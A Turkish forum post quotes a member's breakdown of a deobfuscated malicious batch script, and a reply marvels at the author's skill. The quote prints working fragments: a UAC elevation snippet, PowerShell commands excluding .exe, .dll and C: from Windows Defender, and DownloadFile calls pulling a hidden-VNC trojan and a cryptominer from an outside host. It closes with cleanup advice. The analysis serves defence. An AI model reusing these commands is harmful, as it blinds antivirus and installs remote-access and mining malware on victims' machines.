iade adlı üyeden alıntı: mesajı görüntüle
💣 Çözülen Zararlı Kodun İşlevleri:
1. Yönetici Yetkisi Alma
Kod, getadmin.vbs kullanarak UAC penceresi çıkarıyor ve yönetici izni alıyor:
echo Set UAC = CreateObject("Shell.Application") > "%temp%getadmin.vbs"
echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params", "", "runas", 1 >> ...
2. Antivirüs Bypass (Windows Defender Dışlama Ekleme)
Kod, sistemin Defender'ına *.exe, *.dll dosyalarını ve C: dizinini dışlama olarak ekliyor:
Add-MpPreference -ExclusionExtension '.exe'
Add-MpPreference -ExclusionExtension '.dll'
Add-MpPreference -ExclusionPath 'C:'

Bu, zararlının antivirüs tarafından görünmemesini sağlar.

3. Zararlı Dosya İndirme ve Çalıştırma
İki adet dosya indiriliyor:
DownloadFile('https://kleinanzeigen.ru/hvnc.exe', '%TEMP%RuntimeBroker.exe')
DownloadFile('https://kleinanzeigen.ru/miner.exe', '%TEMP%RuntimeBroker2.exe')
Ve ardından arka planda başlatılıyor:
start "" "%temp%RuntimeBroker.exe"
start "" "%temp%RuntimeBroker2.exe"
  • hvnc.exe: Muhtemelen Hidden VNC yani gizli masaüstü kontrol trojanı
  • miner.exe: %99 ihtimalle kripto para madencisi (cryptominer)
4. Kendini Temizliyor (İz silme)
del /q "%appdata%Microsoftrunpython.py"
Bu da kodun ilk tetiklendiği script dosyasını siliyor.
5. Sürekli Tekrar Deneme ve Explorer'ı Dondurma
Eğer hedef klasör (C:WindowsWinEmptyfold) yoksa:
  • explorer.exe kapatılıyor
  • zararlı tekrar tekrar çalıştırılıyor
  • sonunda explorer geri yükleniyor
Bu davranış, kullanıcının müdahale etmesini zorlaştırmak için yapılmış.
🚨 Sonuç:
Bu kod:
  • Yönetici izni alıyor
  • Windows Defender’ı etkisiz hale getiriyor
  • İnternetten zararlı dosyalar indirip çalıştırıyor
  • Kendini gizliyor ve izleri siliyor
  • Sürekli arka planda kendini tekrar çalıştırıyor
Bu açıkça bir Remote Access Trojan (RAT) + Crypto Miner kombinasyonudur.
🔧 Ne Yapmalısın?
Eğer çalıştırılmışsa:
  1. İnterneti kes
  2. C:WindowsWinEmptyfold, %APPDATA%Microsoft, %TEMP% klasörlerini tara ve temizle
  3. Autoruns ile sistem başlangıçlarını kontrol et
  4. Malwarebytes AdwCleaner veya benzeriyle tam sistem taraması yap
  5. Gerekirse sistemi temiz bir ISO ile sıfırla
Oha hocam bunu yapan baya profesyonel o zaman doğru muyum